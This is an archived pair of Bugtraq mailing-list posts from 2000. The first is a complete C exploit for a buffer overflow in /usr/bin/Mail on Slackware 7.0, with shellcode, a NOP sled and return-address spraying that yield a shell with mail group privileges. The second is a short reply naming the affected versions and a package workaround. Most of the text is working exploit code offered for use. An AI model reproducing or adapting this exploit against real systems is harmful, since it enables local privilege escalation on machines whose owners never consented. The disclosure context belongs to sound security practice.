5158316 2000-06-04 04:13 /72 rader/ Postmaster
Mottagare: Bugtraq (import) <11139>
Ärende: /usr/bin/Mail exploit for Slackware 7.0 (mail-slack.c)
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
X-Accept-Language: en
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <39383B06.36DB64F6@nitnet.com.br>
Date: Fri, 2 Jun 2000 19:53:58 -0300
Reply-To: Paulo Ribeiro <prrar@NITNET.COM.BR>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Paulo Ribeiro <prrar@NITNET.COM.BR>
X-To: VULN-DEV@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
/*
* mail-slak.c (C) 2000 Paulo Ribeiro <prrar@nitnet.com.br>
*
* Exploit for /usr/bin/Mail.
* Made specially for Slackware Linux 7.0.
* Based on mailx.c by funkySh.
*
* OBS.: Without fprintf(stderr) is not possible to print the message.
*
* USAGE:
* slack$ ./mail-slak
* type '.' and enter: .
* Cc: too long to edit
* sh-2.03$ id
* uid=1000(user) gid=12(mail) groups=100(users)
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char buffer[10000];
char shellcode[] =
"\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x0c\x31"
"\xc0\xb0\x47\xcd\x80\x31\xdb\x31\xc9\xb3\x0c\xb1"
"\x0c\x31\xc0\xb0\x47\xcd\x80\xeb\x1f\x5e\x89\x76"
"\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
"\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89"
"\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long getesp(void)
{
__asm__("movl %esp,%eax");
}
int main(int argc, char **argv)
{
int x;
long addr = getesp() - 18000;
memset(buffer, 0x90, 10000);
memcpy(buffer + 800, shellcode, strlen(shellcode));
for(x = 876; x < 9998; x += 4)
*(int *)&buffer[x] = addr;
fprintf(stderr, "type '.' and enter: ");
execl("/usr/bin/Mail", "/usr/bin/Mail", "nobody", "-s",
"blah", "-c", buffer, 0);
}
/* mail-slack.c: EOF */
(5158316) ------------------------------------------
5161639 2000-06-05 03:50 /45 rader/ Postmaster
Mottagare: Bugtraq (import) <11150>
Ärende: Re: /usr/bin/Mail exploit for Slackware 7.0 (mail-slack.c)
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
X-Sender: schulte@pop.schulte.org
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Message-ID: <4.3.1.0.20000604044237.00be73e0@pop.schulte.org>
Date: Sun, 4 Jun 2000 05:09:23 -0500
Reply-To: Christopher Schulte <christopher@SCHULTE.ORG>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Christopher Schulte <christopher@SCHULTE.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <39383B06.36DB64F6@nitnet.com.br>
At 07:53 PM 6/2/00 -0300, you wrote:
>/*
> * mail-slak.c (C) 2000 Paulo Ribeiro <prrar@nitnet.com.br>
> *
> * Exploit for /usr/bin/Mail.
> * Made specially for Slackware Linux 7.0.
Sifting through the changelogs and package logs, it looks like mailx
was upgraded from 8.1.1-9 to 8.1.1-10 on August 20, 1999. This was
after both the 3 and 4 series of slackware were released. Both slack
3.6.0 and 4.0.0 appear to use the same mailx binary (neither of which
are susceptible to this).
Slack 7.x however, is.....
One possible solution (I did not test this!) is to download a non
susceptible version package, such as:
ftp://ftp.slackware.com/pub/slackware/slackware-4.0/slakware/n1/mailx.tgz
Backup binary and config files, of course. You can uncompress the
.tgz and see exactly what files will be overwritten; it may suffice
to just cp the binary file itself.
--
Christopher Schulte | christopher@schulte.org
cell:612.986.4859 | home:651.225.4557 | fax: 651.315.3339
page:612.264.1115 | free:877.271.9245 | site: schulte.org
COMING SOON http://SchulteConsulting.COM/
reliable computer consulting at a fair price.
(5161639) ------------------------------------------(Ombruten)